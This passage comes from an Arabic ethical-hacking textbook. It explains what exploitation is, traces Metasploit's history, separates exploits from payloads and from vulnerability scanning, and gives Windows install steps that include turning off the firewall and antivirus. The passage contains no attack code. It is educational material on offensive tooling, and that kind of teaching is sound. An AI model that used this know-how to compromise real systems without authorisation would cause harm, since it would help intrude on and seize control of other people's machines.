‫اﻟﻣﮭﺎﺟم‪ ،‬ﯾﺗﺑﻊ اﻟﮭﺎﻛر اﻷﺧﻼﻗﻲ أﯾﺿﺎ ﻧﻔس اﻟﺧطوات ﻻﺧﺗﺑﺎر اﻟﻧظﺎم أو ﺷﺑﻛﺔ‪ .‬ﻣن أﺟل ﺿﻣﺎن ﻓﻌﺎﻟﯾﺔ اﻻﺧﺗﺑﺎر‪ ،‬واﻟﮭﺎﻛر اﻷﺧﻼﻗﻲ ﯾﺗﺑﻊ ﻣﻧﮭﺟﯾﺔ‬
‫اﻟﻘرﺻﻧﺔ‪ .‬اﻟرﺳم اﻟﺑﯾﺎﻧﻲ اﻟﺗﺎﻟﻲ ﯾﺻور ﻣﻧﮭﺟﯾﺔ اﻟﻘرﺻﻧﺔ ﺗﻠﯾﮭﺎ ﻗراﺻﻧﺔ اﻷﺧﻼﻗﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪296‬‬

‫ﻣﺎ ھو اﻻﺧﺗراق ‪ EXPLOITATION‬او ‪SYSTEM HACKING‬؟‬


‫ﻣن أﺑﺳط اﻟﻣﺻطﻠﺣﺎت‪ Exploitation ،‬ھو اﺳﺗﻐﻼل ﻟﻧﻘﺎط اﻟﺿﻌف ﻟﻠﻘﯾﺎم ﺑﻌﻣﻠﯾﺔ اﻛﺗﺳﺎب اﻟﺳﯾطرة ﻋﻠﻰ اﻟﻧظﺎم‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﻣن اﻟﻣﮭم أن‬
‫ﻧﻔﮭم أن ﻟﯾس ﻛل اﺧﺗراق ﯾؤدي إﻟﻰ اﻟﺳطو اﻟﻛﺎﻣل ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ Oracle padding exploit ،‬ﯾﻣﻛﻧﮭﺎ أن ﺗﻛﺷف ﻋن‬
‫اﻟﻣﻌﻠوﻣﺎت واﻟﺳﻣﺎح ﻟﻧﺎ ﺑﺗﺣﻣﯾل اﻟﻣﻠﻔﺎت وﻟﻛﻧﮭﺎ ﻻ ﺗﺳطو ﻋﻠﻰ اﻟﻧظﺎم ﺑﺷﻛل ﻛﺎﻣل‪ .‬ﺗﻌرﯾف أﻛﺛر دﻗﺔ‪ ،‬ﻓﺎن اﻻﺧﺗراق )‪ (Exploitation‬ھو‬
‫وﺳﯾﻠﺔ ﻟﺗﺟﺎوز ﺛﻐرة أﻣﻧﯾﺔ أو اﻟﺗﺣﺎﯾل ﻋﻠﻰ اﻟﺿواﺑط اﻷﻣﻧﯾﺔ‪ .‬ھذه اﻟﻌﻣﻠﯾﺔ ﯾﻣﻛﻧﮭﺎ أن ﺗﺗﺧذ أﺷﻛﺎﻻ ﻣﺧﺗﻠﻔﺔ وﻟﻛن ﻟﻐرض ھذا اﻟﻛﺗﺎب‪ ،‬واﻟﮭدف‬
‫اﻟﻧﮭﺎﺋﻲ ﯾﺑﻘﻰ داﺋﻣﺎ ھو ﻧﻔﺳﮫ‪ :‬اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﺳﺗوى اﻹداري )‪ (administrative-level‬ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻓﻲ ﻧواح ﻛﺛﯾرة‪ ،‬ﻓﺎن اﻻﺧﺗراق‬
‫ھو ﻣﺣﺎوﻟﺔ ﻟﺗﺣوﯾل اﻟﺟﮭﺎز اﻟﮭدف إﻟﻰ دﻣﯾﺔ ﻣن ﺷﺄﻧﮭﺎ أن ﺗﻧﻔذ اﻷواﻣر اﻟﺧﺎﺻﺔ ﺑك وﺗﻘدﯾم اﻟﻌطﺎءات اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻟﻣﺟرد أن ﻧﻛون واﺿﺣﯾن‪،‬‬
‫ﻓﺎن ﻋﻣﻠﯾﺔ اﻻﺧﺗراق )‪ (Exploitation‬ھو ﻋﻣﻠﯾﺔ إطﻼق ‪ Exploit .Exploit‬ھو ﺗﺣﻘﯾﻖ‪ ،‬ادراك‪ ،‬أو اﻛﺗﺷﺎف ﻧﻘﺎط اﻟﺿﻌف‪Exploit .‬‬
‫ھو وﺳﯾﻠﮫ أو ﺧﻠل ﻓﻲ رﻣز اﻟﺑرﻧﺎﻣﺞ اﻟﺗﻲ ﺗﻌطﻲ اﻟﻘراﺻﻧﺔ أو اﻟﻣﮭﺎﺟم اﻟﻘدرة ﻋﻠﻰ إطﻼق أو ﺗﻧﻔﯾذ اﻟﮭﺟﻣﺎت ﺿد اﻟﻧظﺎم اﻟﮭدف‪ .‬واﻟﺗﻲ ﻣن‬
‫اﻟﻣﻣﻛن ﺗﺣوﯾل اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف اﻟﻰ دﻣﯾﺔ وإﺟﺑﺎرھﺎ ﻋﻠﻰ اﻟﻘﯾﺎم ﺑﻣﺎ ﻧرﯾد‪ .‬ﯾﻣﻛﻧﮭﺎ اﯾﺿﺎ ﺗﻐﯾﯾر اﻟوظﺎﺋف اﻷﺻﻠﯾﺔ ﻟﻠﺑرﻧﺎﻣﺞ وﺗﺳﻣﺢ ﻟﻧﺎ أﯾﺿﺎ‬
‫اﻟﻘﯾﺎم ﺑﺄي ﻋدد ﻣن اﻷﻣور ﻣﺛل ﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﺟدﯾد‪ ،‬وﺗﻌطﯾل اﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﻌﻣل‪ ،‬إﺿﺎﻓﺔ ﻣﺳﺗﺧدﻣﯾن ﺟدد‪ ،‬وأﻛﺛر ﻣن ذﻟك ﺑﻛﺛﯾر‪.‬‬

‫ﻋﻣﻠﯾﺔ اﻻﺧﺗراق )‪(Exploitation‬ھﻲ واﺣدة ﻣن أﻛﺛر اﻟﻣراﺣل ﻏﻣوﺿﺎ واﻟﺗﻲ ﺳوف ﻧﻐطﯾﮭﺎ‪ .‬اﻟﺳﺑب ﻓﻲ ذﻟك ﺑﺳﯾط؛ ﻛل ﻧظﺎم ﯾﺧﺗﻠف ﻋن‬
‫اﻵﺧر وﻟﻛل ھدف ﻓرﯾد ﻣن ﻧوﻋﮫ‪ .‬اﻋﺗﻣﺎدا ﻋﻠﻰ ﻋدد واﻓر ﻣن اﻟﻌواﻣل‪ ،‬وھﺟوﻣك ﯾﺧﺗﻠف ﻣن ھدف إﻟﻰ ھدف‪ .‬أﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﻣﺧﺗﻠﻔﺔ‬
‫)‪ ،(OSs‬واﻟﺧدﻣﺎت اﻟﻣﺧﺗﻠﻔﺔ‪ ،‬واﻟﻌﻣﻠﯾﺎت اﻟﻣﺧﺗﻠﻔﺔ ﺗﺗطﻠب أﻧواﻋﺎ ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﮭﺟﻣﺎت‪ .‬اﻟﻣﮭﺎﺟﻣﯾن اﻟﻣﮭرة اﻟﺗﻲ ﺗﻔﮭم اﻟﻔروق اﻟدﻗﯾﻘﺔ ﻓﻲ ﻛل ﻧظﺎم‬
‫ﯾﺣﺎوﻟون اﺳﺗﻐﻼﻟﮭﺎ‪ .‬ﻣﻊ اﺳﺗﻣرار ﻣﮭﺎراﺗك ﻓﻲ اﻟﺗﻘدم‪ ،‬ﻓﺳوف ﺗﺣﺗﺎج ﻟﺗوﺳﯾﻊ ﻣﻌرﻓﺗك ﻟﻸﻧظﻣﺔ وﻧﻘﺎط ﺿﻌﻔﮭم‪ .‬إذا ﺗﺣدﺛﻧﺎ ﻋن اﻻﺧﺗراق ﻓﻘﺑل ﻛل‬
‫ﺷﻲء‪ ،‬ﺳوف ﻧﺗﺣدث ﻋن ‪ metasploit‬ﺣﯾث ﺗﻌﺗﺑر ھذه اﻷداة ﻣن اھم اھم أدوات اﻻﺧﺗراق‪.‬‬

‫‪METASPLOIT 5.2‬‬

‫ﻣن ﻛل اﻷدوات اﻟﺗﻲ ﻧوﻗﺷت ﻓﻲ ھذا اﻟﻛﺗﺎب واﻟﺗﻲ ﺳوف ﺗﻧﺎﻗش‪ Metasploit ،‬ھو اﻟﻣﻔﺿل‪ .‬ﻓﻲ ﻧواح ﻛﺛﯾرة‪ ،‬ھو اﻷداة اﻟﻣﺛﺎﻟﯾﺔ ﻟﻠﻘراﺻﻧﺔ‪.‬‬
‫ﺣﯾث ﯾﺗﻣﯾز ﺑﺎﻟﻘوة واﻟﻣروﻧﺔ‪ ،‬ﻣﺟﺎﻧﻲ‪ ،‬وﯾﺣﻣل ﻣﻌﮫ أدوات راﺋﻌﺔ‪ .‬ﻣن دون أدﻧﻰ ﺷك ﺗﻌﺗﺑر أروع أداة ھﺟوﻣﯾﺔ ﻣﺷﻣوﻟﺔ ﻓﻲ ھذا اﻟﻛﺗﺎب‪ ،‬وﺣﺗﻰ‬
‫ﻓﻲ ﺑﻌض اﻟﺣﺎﻻت ﻷﻧﮭﺎ ﺗﺗﯾﺢ ﻟك اﻹﺧﺗراق ﻣﺛل ھﯾو ﺟﺎﻛﻣﺎن ﻓﻲ ﻓﯾﻠم ‪ !Swordfish‬ﻋﻠﻰ ﻣﺣﻣل اﻟﺟد‪ ،‬أﻧﮭﺎ ﺟﯾدة‪ .‬ھذه اﻷداة ﺳوف ﯾﺳرد ﻟﮭﺎ‬
‫ﻛﺗﺎب ﻛﺎﻣل ﻻﺣﻘﺎ ﯾﺗﻛﻠم ﻋﻧﮭﺎ ﻧظرا ﻷھﻣﯾﺗﮭﺎ وﻟﻛﻧﻧﺎ ھﻧﺎ ﺳوف ﻧﺗﻛﻠم ﻋن اﻻﺳﺎﺳﯾﺎت ﻓﻘط‪.‬‬

‫ﻓﻲ ﻋﺎم ‪ ،2004‬ﻓﻲ ‪ ،Defcon 12‬ﻓﺎن ﻛل ﻣن اﺗش دي ﻣورى )‪ (HD Moore‬وﺳﺑوﻧم )‪ (Spoonm‬ھزوا اﻟﻌﺎﻟم ﻋﻧدﻣﺎ أﻋطوا ﻣﺣﺎﺿرة‬
‫ﺑﻌﻧوان "‪ :Metasploit‬اﻟﻘرﺻﻧﺔ ﻛﻣﺎ ﻓﻲ اﻷﻓﻼم"‪ُ .‬رﻛز ھذا اﻟﻌرض ﻋﻠﻰ " إطﺎرات اﻻﺧﺗراق )‪ ."(Exploit Frameworks‬إطﺎر‬
‫اﻻﺧﺗراق )‪ (exploit framework‬ھو ﺑﻧﯾﺔ رﺳوﻣﯾﺔ ﻟﺗطوﯾر وإطﻼق ‪ .exploit‬اﻷطر)‪ (framework‬ﺗﺳﺎﻋد ﻓﻲ ﻋﻣﻠﯾﺔ اﻟﺗﻧﻣﯾﺔ ﻣن ﺧﻼل‬
‫ﺗوﻓﯾر اﻟﺗﻧظﯾم واﻟﻣﺑﺎدئ اﻟﺗوﺟﯾﮭﯾﺔ ﻟﻛﯾﻔﯾﺔ ﺗﺟﻣﯾﻊ ﻣﺧﺗﻠف اﻟﻘطﻊ وﺗﻔﺎﻋﻠﮭم ﻣﻊ ﺑﻌﺿﮭم اﻟﺑﻌض‪.‬‬
‫‪ Metasploit‬ﺑدأت ﻓﻌﻼ ﻛﻠﻌﺑﮫ ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ ،‬وﻟﻛﻧﮭﺎ ﻗد ﺗﺣﻘﻖ ﻛﺎﻣل إﻣﻛﺎﻧﺎﺗﮭﺎ ﻋﻧدﻣﺎ ﯾﺗم ﺗﺣوﯾﻠﮭﺎ إﻟﻰ أداة ﻛﺎﻣﻠﺔ ﻓﻲ ﻋﻣﻠﯾﺔ اﻻﺧﺗراق ‪.Exploit‬‬
‫‪ Metasploit‬ﯾﺣﺗوي ﻓﻲ اﻟواﻗﻊ ﻋﻠﻰ ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻟﺗﻲ ﺗﺷﻣل اﻟﻌﺷرات ﻣن اﻟوظﺎﺋف ﻣﺧﺗﻠﻔﺔ ﻷﻏراض ﻣﺧﺗﻠﻔﺔ وﻟﻛن رﺑﻣﺎ ﯾﻔﺿل‬
‫ﻣﻌرﻓﺔ إطﺎرات اﻻﺧﺗراق )‪ (Exploit Frameworks‬اﻟﻘوﯾﺔ واﻟﻣرﻧﺔ ﻣﻧﮭﺎ‪.‬‬
‫ﻗﺑل اﻻﻓراج ﻋن ‪ ،Metasploit‬ﻛﺎن اﻟﺑﺎﺣﺛون ﻓﻲ اﻷﻣن ﻟدﯾﮭم ﺧﯾﺎرﯾن رﺋﯾﺳﯾﯾن‪ :‬اﻣﺎ ان ﯾﺗﻣﻛﻧوا ﻣن ﺗطوﯾر اﻷﻛواد اﻟﻣﺧﺻﺻﺔ ﻋن طرﯾﻖ‬
‫اﻟﺗﻔﻛﯾك ﻣﻊ ﻣﺧﺗﻠف ‪ exploit‬و‪ payloads‬أو أﻧﮫ ﯾﻣﻛن أن ﯾﺳﺗﻐل واﺣدا ﻣن اﺛﻧﯾن ﻣن )‪ (Exploit Frameworks‬اﻟﻣﺗﺎﺣﺔ ﺗﺟﺎرﯾﺎ‪،‬‬
‫‪ CORE Impact‬أو‪ . ImmunitySec’s CANVAS‬وﻛﻼھﻣﺎ ﯾﻌدوا ﺧﯾﺎرﯾن ﻋظﯾﻣﯾن وﻧﺎﺟﺣﯾن ﻟﻠﻐﺎﯾﺔ ﻓﻲ ﺣد ذاﺗﮭﻣﺎ‪ .‬وﻟﻛن ﻟﻸﺳف‪،‬‬
‫ﻓﺈن ﺗﻛﻠﻔﺔ اﻟﺗرﺧﯾص واﺳﺗﺧدام ھذه اﻟﻣﻧﺗﺟﺎت ﻋﺎﻟﻲ ﻣﻣﺎ ﯾﻌﻧﻲ اﻧﮫ ﻟم ﯾﻛن ﻟدي اﻟﻌدﯾد ﻣن اﻟﺑﺎﺣﺛﯾن ﻓﻲ ﻣﺟﺎل اﻷﻣن اﻟوﺻول إﻟﯾﮭﺎ‪.‬‬
‫ﻛﺎن ‪ Metasploit‬ﻣﺧﺗﻠﻔﺔ ﻋن ﻛل ﺷﻲء آﺧر ﻷﻧﮭﺎ اﻟﻣرة اﻷوﻟﻰ‪ ،‬اﻟﺗﻲ ﯾﺗﺎح )‪ (Exploit Frameworks‬ﻣﻔﺗوح اﻟﻣﺻدر ﻟﻛل ﻣن اﻟﻘراﺻﻧﺔ‬
‫وﻣﺧﺗﺑري اﻻﺧﺗراق ﻟﻠوﺻول إﻟﯾﮭﺎ‪ .‬وھذا ﯾﻌﻧﻲ أﻧﮫ ﻟﻠﻣرة اﻷوﻟﻰ‪ ،‬ﯾﺻﺑﺢ )‪ (Exploit Frameworks‬ﻣﺗﺎﺣﮫ ﻟﻠﺟﻣﯾﻊ‪ ،‬ﻣﻣﺎ أدى اﻟﻰ وﺟود‬
‫ﺗﻌﺎون ﺑﯾﻧﮭم‪ ،‬وﺗطوﯾر ‪ ،Exploit‬وﺗﺑﺎدﻟﮭﺎ ﻓﯾﻣﺎ ﺑﯾﻧﮭم ﻣﺟﺎﻧﺎ‪.‬‬
‫‪ Metasploit‬ﯾﺳﻣﺢ ﻟك ﺑﺎﺧﺗﯾﺎر اﻟﮭدف واﻻﺧﺗﯾﺎر ﻣن ﺑﯾن ﻣﺟﻣوﻋﺔ واﺳﻌﺔ ﻣن ‪ Payloads .payloads‬ﻗﺎﺑﻠﺔ ﻟﻠﺗﺑﺎدل وﻻ ﯾﻣﻛن رﺑطﮭﺎ‬
‫ﺒ ‪Exploit‬ﻣﺣدده‪ Payloads .‬ھﻲ "وظﺎﺋف إﺿﺎﻓﯾﺔ" أو ﺗﻐﯾﯾر ﻓﻲ اﻟﺳﻠوك اﻟذي ﺗرﯾد ﺗﺣﻘﯾﻘﮫ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ .‬ھذا ھو اﻟﺟواب ﻋﻠﻰ‬
‫اﻟﺳؤال‪" :‬ﻣﺎذا أرﯾد أن أﻓﻌل اﻵن ﻋﻠﻰ اﻟﺟﮭﺎز اﻟذي ﻟدي ﺳﯾطرة ﻋﻠﯾﮫ؟" ﺗﺷﻣل ‪ Metasploit‬ال ‪ payloads‬اﻷﻛﺛر ﺷﻌﺑﯾﺔ ھو إﺿﺎﻓﺔ‬
‫ﻣﺳﺗﺧدﻣﯾن ﺟدد‪ ،‬وﻓﺗﺢ ‪ ،backdoor‬وﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﺟدﯾد ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف‪ .‬وﺳﯾﺗم ﺗﻐطﯾﺔ ﻗﺎﺋﻣﺔ اﻟﻛﺎﻣﻠﺔ ﻠ ‪Metasploit payloads‬‬
‫ﻗرﯾﺑﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪297‬‬

‫ﻗﺑل أن ﻧﺑدأ ﻓﻲ ﺗﻐطﯾﺔ ﺗﻔﺎﺻﯾل ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ‪ ،Metasploit‬ﻓﻣن اﻟﻣﮭم أن ﻧﻔﮭم اﻟﻔرق ﺑﯾن ‪ Metasploit‬وﻓﺎﺣص ﻧﻘﺎط اﻟﺿﻌف‬
‫)‪ .(Vulnerability scanner‬ﻓﻲ ﻣﻌظم اﻟﺣﺎﻻت‪ ،‬ﻋﻧدﻣﺎ ﻧﺳﺗﺧدم ﻓﺎﺣص ﻧﻘﺎط اﻟﺿﻌف‪ ،‬اﻟﻔﺎﺣص ﺳوف ﯾﺗﺣﻘﻖ ﻓﻘط ﻟﻣﻌرﻓﺔ ﻣﺎ إذا ﻛﺎن‬
‫اﻟﻧظﺎم ھو ﻋرﺿﺔ ﻟﻠﺧطر‪ .‬ﯾﺣدث ھذا ﺑطرﯾﻘﺔ ﺳﻠﺑﯾﺔ أي ﻻ ﯾﺗﻔﺎﻋل ﻣﻊ اﻟﻧظﺎم اﻟﮭدف ﺟدا ﻣﻊ ﻓرﺻﺔ ﺿﺋﯾﻠﺔ ﻣن أي ﺿرر ﻏﯾر ﻣﻘﺻود أو‬
‫ﺗﻌطﯾل ﻟﮭذا اﻟﮭدف‪ .‬اﻣﺎ ‪ Metasploit‬وﻏﯾرھﺎ ﻣن ‪ Framework‬ھﻲ أدوات اﺧﺗراق‪ .‬ھذه اﻷدوات ﻻ ﺗؤدى اﺧﺗﺑﺎرات؛ وﻟﻛن ﺗﺳﺗﺧدم ھذه‬
‫اﻷدوات ﻹﻛﻣﺎل اﻻﺧﺗراق اﻟﻔﻌﻠﻲ ﻟﮭذا اﻟﮭدف‪ .‬ﻓﺎﺣص ﻧﻘﺎط اﻟﺿﻌف )‪ (Vulnerability scanner‬ﯾﺑﺣث ﻋن ﻧﻘﺎط اﻟﺿﻌف اﻟﻣﺣﺗﻣﻠﺔ وﺗﻘدﯾم‬
‫ﺗﻘرﯾر‪ Metasploit .‬ﯾﺣﺎول ﻓﻌﻼ اﺳﺗﻐﻼل ﻧﻘﺎط اﻟﺿﻌف واﺧﺗراق اﻟﻧظﺎم اﻟذى ﯾﻔﺣﺻﮫ‪ .‬ﺗﺄﻛد ﻣن أﻧك ﺗﻔﮭم ھذا‪.‬‬
‫ﻓﻲ ﻋﺎم ‪ ،2009‬ﺗم ﺷراء ‪ Metasploit‬ﻣن ﻗﺑل ‪ .Rapid 7‬أﻣﺿﻰ اﺗش دي ﻣورى )‪ (HD Moore‬ﻗدرا ﻛﺑﯾرا ﻣن اﻟوﻗت ﯾوﺿﺢ ﻟﻠﻧﺎس‬
‫ﺑﺄن ‪ Metasploit‬ﺳوف ﯾظل ﻣﺟﺎﻧﺎ‪ .‬ﻋﻠﻰ اﻟرﻏم ﻣﻧذ ذﻟك اﻟﺣﯾن ﺗم اﻻﻓراج ﻋن اﻟﻌدﯾد ﻣن اﻟﻣﻧﺗﺟﺎت اﻟﺗﺟﺎرﯾﺔ اﻟﻛﺑﯾرة ﺑﻣﺎ ﻓﻲ ذﻟك‬
‫‪ Metasploit Express‬و‪ ،Metasploit Pro‬وﻛﺎن اﺗش دي ﻣورى )‪ (HD Moore‬وﻓﯾﺎ ﻓﻲ ﻛﻠﻣﺗﮫ وﺑﻘﻲ ﻣﺷروع ‪Metasploit‬‬
‫اﻷﺻﻠﻲ ﺣر وﻣﺟﺎﻧﺎ‪ .‬ﻓﻲ اﻟواﻗﻊ‪ ،‬ﻛﺎن ﺷراء ‪ Metasploit‬ﺑواﺳطﺔ ‪ Rapid 7‬دﻓﻌﺔ ﻗوﯾﺔ ﻟﻠﻣﺷروع ‪ .Metasploit‬ﻣﺷروع ﻣﻔﺗوح اﻟﻣﺻدر‬
‫ﯾﺳﺗﻔﯾد ﺑوﺿوح ﻣن اﻷدوات اﻟﺗﺟﺎرﯾﺔ اﻟﺗﻲ ﯾﺗم دﻓﻌﮭﺎ ﻣﻊ ﺗطوﯾر ﺑدوام ﻛﺎﻣل إﺿﺎﻓﯾﺔ ودﻋم‪ .‬ﺳوف ﻧرﻛز ﻋﻠﻰ اﻷﺳﺎﺳﯾﺎت ھﻧﺎ‪ ،‬وﻟﻛن إذا ﻛﻧت‬
‫ﺗرﻏب ﻓﻲ اﻟﺑﻘﺎء ﻋﻠﻰ رأس أﺣدث اﻟﺗطورات ﻓﻲ اﻟﻣﺳﺗﻘﺑل ﻓﺎﺳﺗﻣر ﻓﻲ اﻟﺗطوﯾر‪.‬‬
‫‪ Metasploit‬ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻣﺟﺎﻧﺎ ﻣن اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://www.metasploit.com/‬‬
‫إذا ﻛﻧت ﺗﺳﺗﺧدم ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪ ،‬ﻓﺎن ‪ Metasploit‬ﻣﺛﺑت ﻓﻌﻠﯾﺎ ﺑﮫ‪ .‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻟﻠﺗﻔﺎﻋل ﻣﻊ ‪ ،Metasploit‬وﻟﻛن‬
‫ﺳﯾرﻛز ھذا اﻟﻛﺗﺎب ﻋﻠﻰ اﺳﺗﺧدام‪ ،‬واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟﻐﯾر رﺳوﻣﯾﺔ )‪ (GUI‬او ﻣﺎ ﯾﺳﻣﻰ ﺑﺎﻟوﺟﮫ اﻟﻧﺻﯾﺔ‪ ،‬واﻟذي ﯾﺳﻣﻰ ‪ .msfconsole‬ﺑﻣﺟرد‬
‫ﻓﮭم اﻷﺳﺎﺳﯾﺎت‪ ،‬ﻓﺎن ‪ msfconsole‬ﺳوف ﯾﺻﺑﺢ ﺳرﯾﻊ‪ ،‬ودي‪ ،‬ﺑدﯾﮭﻲ‪ ،‬وﺳﮭل اﻻﺳﺗﺧدام‪.‬‬

‫اﻣﺎ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻓﻧﻘوم ﺑﺗﺣﻣﯾل ﻧﺳﺧﺔ‪ Metasploit‬اﻟﻣﺧﺻﺻﺔ ﻟﻠوﯾﻧدوز ﻣن اﻟﻣوﻗﻊ اﻟﺳﺎﺑﻖ ذﻛره ﺛم اﺗﺑﺎع اﻟﺧطوات‬
‫اﻟﺗﺎﻟﯾﺔ ﻹﺗﻣﺎم ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪.‬‬
‫‪ -1‬ﺑﻌد اﻟﻘﯾﺎم ﺑﺗﺣﻣﯾل اﻹﺻدار اﻟﻣﺧﺻص ﻟﻧﺳﺦ اﻟوﯾﻧدوز ﻣن ‪ Metasploit‬ﻧﻘوم ﺑﺈﻟﻐﺎء ﺗﻔﻌﯾل ﺟدار اﻟﺣﻣﺎﯾﺔ وﺑرﻧﺎﻣﺞ ﻣﺿﺎد‬
‫اﻟﻔﯾروﺳﺎت‪.‬‬
‫‪ -2‬ﻧﻘوم ﺑﺎﻟﻧﻘر اﻟﻣزدوج ﻋﻠﻰ ‪ Installer‬اﻟذي ﻗﻣﻧﺎ ﺑﺗﺣﻣﯾﻠﮫ ﻣن ﻗﺑل ﺛم ﻧﺗﺑﻊ ‪ Wizard‬ﻓﻲ ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺣﺗﻰ ﻧﺻل اﻟﻰ اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫إذا ﻟم ﺗﻘم ﺑﻌدم اﻟﻐﺎء ﺗﻔﻌﯾل ﻛل ﻣن ﺟدار اﻟﺣﻣﺎﯾﺔ وﺑرﻧﺎﻣﺞ ﻣﺿﺎد اﻟﻔﯾروﺳﺎت ﻓﮭذا ﺳوف ﯾوﻗف ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت وﯾؤدى اﻟﻰ ظﮭور‬ ‫‪-3‬‬
‫رﺳﺎﻟﺔ ﺗﺧﺑرك ﺑﺎﻧﮫ ﯾﺟب اﻟﻐﺎء ﺗﻔﻌﯾل ﺟدار اﻟﺣﻣﺎﯾﺔ‪.‬‬
‫ﺛم ﺑﻌد ذﻟك ﻧﻧﻘر ﻓوق ‪ Next‬واﻟﺗﻲ ﺗذھب اﻟﻰ ﺷﺎﺷﮫ أﺧرى ﯾرﯾد ﻣﻧك ﻓﯾﮫ وﺿﻊ اﻟﻣﻧﻔذ اﻟذي ﺳوف ﯾﺳﺗﺧدﻣﮫ اﻟﺗطﺑﯾﻖ‪ .‬ﻧدﺧل ﻣﻧﻔذ‬ ‫‪-4‬‬
‫‪ SSL‬ﻟﻛﻲ ﯾﺳﺗﺧدﻣﮫ ﺧدﻣﺔ ‪ Metasploit‬ﺛم ﻧﻧﻘر ﻓوق ‪ .Next‬اﻓﺗراﺿﯾﺎ‪ ،‬ﯾﺳﺗﺧدم ﺧﺎدم اﺑﺎﺗﺷﻲ اﻟﻣﻧﻔذ ‪ 3790‬ل‪ . HTTPS‬إذا ﻛﺎن‬
‫اﻟﻣﻧﻔذ ﻣﻧﺿم ﺑﺎﻟﻔﻌل إﻟﻰ ﻋﻣﻠﯾﺔ أﺧرى‪ ،‬ﺗﺣدﯾد ﻣﺎ إذا ﻛﺎن ﻋﻣﻠﯾﺔ ﯾﺗم اﻻﺳﺗﻣﺎع ﻋﻠﻰ ھذا اﻟﻣﻧﻔذ وﻏﻠﻖ اﻟﻌﻣﻠﯾﺔ‪ ،‬أو ﯾﻣﻛﻧك إدﺧﺎل ﻣﻧﻔذ‬
‫آﺧر ﻣن ھذا اﻟﻘﺑﯾل ﻛﻣﺎ ‪ 8080‬أو ‪.442‬‬
‫ﻧﺗرك اﻹﻋدادات اﻻﻓﺗراﺿﯾﺔ ﻛﻣﺎ ھﻲ ﺛم ﻧﻘر ﻓوق ‪ Next‬وﻋﻧد اﻻﻧﺗﮭﺎء ﻣن ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﻧﻧﻘر ﻓوق ‪.Finish‬‬ ‫‪-5‬‬
‫ﻧﻘوم اﻻن ﺑﺗﺷﻐﯾل ‪ Metasploit‬وذﻟك ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-6‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪298‬‬

‫‪Start > Programs > Metasploit > Access Metasploit UI‬‬


‫او ﻛﺗﺎﺑﺔ ﻋﻧوان ‪ URL‬اﻟﺗﺎﻟﻲ ‪ https://localhost:3790‬ﻓﻲ ﻣﺗﺻﻔﺢ اﻟوﯾب اﻟﺧﺎص ﺑك‪.‬‬
‫‪ -7‬ﻋﻧد ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ ﻧﺧﺗﺎر ‪ add exception‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -8‬ﺗظﮭر ﺷﺎﺷﮫ أﺧرى ﺗﺿﻊ ﻓﯾﮭﺎ اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ ﺑك‪.‬‬

‫)‪MASTERING THE METASPLOIT CONSOLE (MSFCONSOLE‬‬

‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬ﺳوف ﻧدرس وﺣدة اﻟﺗﺣﻛم ‪ .(msfconsole) Metasploit‬ﯾﺗم اﺳﺗﺧدام ‪ msfconsole‬ﻓﻲ اﻟﻣﻘﺎم اﻷول ﻹدارة ﻗﺎﻋدة ﺑﯾﺎﻧﺎت‬
‫‪ ،Metasploit‬وإدارة اﻟﺟﻠﺳﺎت‪ ،‬وﺗﻛوﯾن وإطﻼق وﺣدات ‪ .Metasploit‬ﻓﮭو أﺳﺎﺳﻲ‪ ،‬ﻷﻏراض اﻻﺧﺗراق‪ ،‬ﻓﺈن ‪ msfconsole‬ﯾﺣﺻل‬
‫ﻋﻠﻰ اﺗﺻﺎل إﻟﻰ اﻟﻣﺿﯾف اﻟﮭدف ﺑﺣﯾث ﯾﻣﻛﻧﮫ إطﻼق ‪ exploit‬اﻟﺧﺎص ﺿدھﺎ‪.‬‬
